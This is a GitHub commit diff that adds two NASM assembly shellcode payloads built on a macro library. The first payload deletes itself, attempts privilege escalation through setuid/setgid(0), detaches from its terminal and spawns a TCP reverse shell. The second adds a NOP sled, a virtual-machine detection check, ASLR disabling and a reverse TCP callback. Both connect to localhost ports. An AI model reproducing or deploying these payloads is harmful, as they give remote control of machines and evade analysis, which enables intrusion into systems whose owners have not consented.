File tree Expand file tree Collapse file tree 2 files changed +22
-0
lines changed Expand file tree Collapse file tree 2 files changed +22
-0
lines changed Original file line number Diff line number Diff line change 1+ BITS 64
2+ %include "bmj.asm"
3+ section .text
4+ global _start
5+ _start:
6+ remove_self ; The binary removes itself if it's size is circa current payload size ('fsize' variable)
7+ set_priority MAX_PRIO ; We set process priority to maximum
8+ elevate_full ; Privilege escalation attempt via SETGID(0) ats SETUID(0)
9+ tty_detach ; setsid(0x00) == detach from controlling TTY device
10+ revshell "127.0.0.1" , 5555 ; Spawn a standard TCP reverse shell
11+ get_current_size_var ; Initiate the 'fsize' variable used by 'remove_self' macro
Original file line number Diff line number Diff line change 1+ BITS 64
2+ %include "bmj.asm"
3+ section .text
4+ global _start
5+ _start:
6+ nops 40
7+ flock ; Enforce only a single process instance of the payload running concurrently
8+ vm_age ; Check if the sample was launched inside VM by inspecting /etc/hostname STATX structure
9+ disable_aslr ; Disable ASLR for further use
10+ sock_connect "127.0.0.1" , 6666 ; Address for reverse TCP pingpack
11+ padd_byte 800 , 0x90 ; Padds the payload size with '0x90' to reach exactly 256 bytes in total after being composed by Nasm
You can’t perform that action at this time.
0 commit comments